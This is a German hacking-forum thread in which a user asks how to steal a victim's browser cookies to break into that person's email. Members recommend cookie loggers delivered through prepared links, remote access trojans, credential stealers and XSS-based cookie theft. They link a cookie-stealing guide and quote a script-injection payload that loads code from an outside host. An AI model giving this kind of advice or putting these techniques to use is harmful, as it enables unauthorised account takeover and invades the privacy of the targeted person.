Moin...

soweit ich mich recht erinnere sind ja die Kekse dafür da, dass die website sich bei betreten an das Passwort und an den Login Namen automatisch erinnert zum leichteren einloggen des Benutzers.
Kann ich diese cookies irgendwie von meinem ViC auf meinen PC übertragen? :o

lg

Ich glaube das kommt drauf an was dein Vic benutz .
Jetzt z.B. wenn der Firefox benutz dann findest du die Cookies unter -->
C:\Dokumente und Einstellungen\<User>\Anwendungsdaten\Mozilla\Firefox\Profiles\blablabl a.default\cookies.txt

ist es denn möglich mir die einfach so rüberzu ziehen
und der seite dann vorzugaukeln ich wäre das und mich dann einfach ein loggen?

Was willst du denn übrigens mit den Vic-Cookies machen?
Du kannst dir, wie ich es gemacht habe, einen Cookie Logger in PHP schreiben, womit du weit mehr als nur Cookies abfangen und speichern kannst. Dein Vic muss dabei nur auf ein von dir präparierten Link draufklicken.

Wenn ein RAT mit nem Filemanager benuzt dann kannst du die Cookies einfach rüberziehn auf deinen Rechenr.
Aber ob das mit dem "vorgaukeln" klappt weiß ich nicht :D

Was bringen mir die Cookies...
ich will in seine scheiß email addy :D

http://free-hack.com/text-tutorials/46575-ist-ein-stealer.html
</sufu>

spynet zeigt mir das Passwort nicht an.

Aber er hat auch kein PW eingegeben als er sich zuletzt die Emails angeguckt hat.
Oder wenn er in MSN geht, dann gibt er auch nix ein...

@kalachnikov (http://free-hack.com/member.php?u=60721) wärst du so freundlich und könntest uns diesen cookie-looger einmal hochladen?

mfg

Leute das funktioniert nur bedingt , denn die cookies verfallen mit der zeit oder halten nur für die eine session .... Mir ist nicht bekannt dass es so noch funktioniert , aber über xss lücken kann dass Cookie gestealt und dann mit dem FF addon Live http headers so eingegeben werden dass man dann zugriff auf die Seite hat ohne das PW raußzubekommen schaut mal nach "Cookie faking"

lade dir nen stealer upp denn auf dein vic und guck dann nen bishen in sein emails oder was du auch immer machen willst

mal einer frage dazu... ich habe in einem anderem forum (nichts mit so sachen wie FH zu tun ) mein passwort vergessen.. Email recovery ist auf der seite verkackt.. (funktioniert nicht..)so nun frag ich mich ob ich noch irgendwie an mein passwort kommen kann ...

mit nem stealer versuch ich das ganze nochmal aber glaube eher weniger,dass das klappt weil das schon mitlerweile fast n monat her ist als ich mich mit meinem account dort ein bzw ausgeloggt hab..

Ist ein bisschen OT aber vielleicht kann mir einer auf die schnelle helfen

Lg,
v0Dka.

Schreib dem Admin eine mail , mit der email von der registration dass er dir dein pw zusenden//ändern soll und gut ist ;) ich denke nicht das da noch einer was sagt ;)
Falls du dein PW nicht im Browser gespeichert hast wirste es auch nicht "stealen" können ! Wenn du mitm IE Unterwegs bist, was ich nicht hoffe kannste ja mal im Protected Storage nachschauen manchmal findet man da auch was

Schreib dem Admin eine mail , mit der email von der registration dass er dir dein pw zusenden//ändern soll und gut ist ;) ich denke nicht das da noch einer was sagt ;)
Falls du dein PW nicht im Browser gespeichert hast wirste es auch nicht "stealen" können ! Wenn du mitm IE Unterwegs bist, was ich nicht hoffe kannste ja mal im Protected Storage nachschauen manchmal findet man da auch was

Der haupt adminj kann passwörter nur ändern bzw links zuschicken..
und der ist immom nicht wirklich erreichbar..

der rest meldet sich nur schwach oder die die keine rechte haben..
und noch ein problem besteht darin ich bin mir nicht mehr wirklich sicher welche email ich verwendet habe..

Das passwort hatte ich lange zeit gesichert bis.. mein kollege meinte ich solle mal schauen auf seinem account weil sein englisch nicht so toll ist ..
Das mit dem beweisen dürfte kein problem sein da mich die admins alle kennen soweit hab manche in steam youtube icq msn geadded... also soweit kein problem nur leider wie bereits gesagt keine rückmeldung :D

PS.: hab grade mal nach stealern geschaut alles ur alt oder nur steam Phishing oder änhliches hab jetzt nicht grade lust neuen ftp zu erstellen usw..
oder nen istealer zu konfigurieren hab grade mein system so schön frei von "nicht schönen sachen"

Der Cookie-Logger/Stealer ist dafür geschrieben worden um unter anderem durch eine XSS Lücke die Cookies etc. des Vice, der auf einen präparierten Link klickt, zu loggen, wie eX0duS (http://free-hack.com/member.php?u=39545) ja schon teilweise beschrieben hat.

Leider kann ich meinen COokie-Lo0ger hier nicht bereit stellen, da ich grade im Ausland verweile und mein Rechner nun mal zu Hause schläft ;)

Um euch aber trotzdem die Logik und den Prinzip eines solchen Logger aufzuzeigen, habe ich hier mal was gefunden, was evtl. helfen sollte.



http://www.all-nettools.com/forum/showthread.php?6811-Moonbat-s-Guide-to-Cookie-Stealing


einfach mal googeln :=)

ein "cookie-stealer" der in JavaScript realisiert wurde und für eine XSS Lücke gedacht ist ist hier einfach nur fehl im Platz und jeder der das nicht erkennt sollte XSS mal ganz schnell aus seiner "Skill List" löschen, dazu gehört mehr als nur "><script src="http://ueber-l0l-wut.com/xss-shell.js"></script>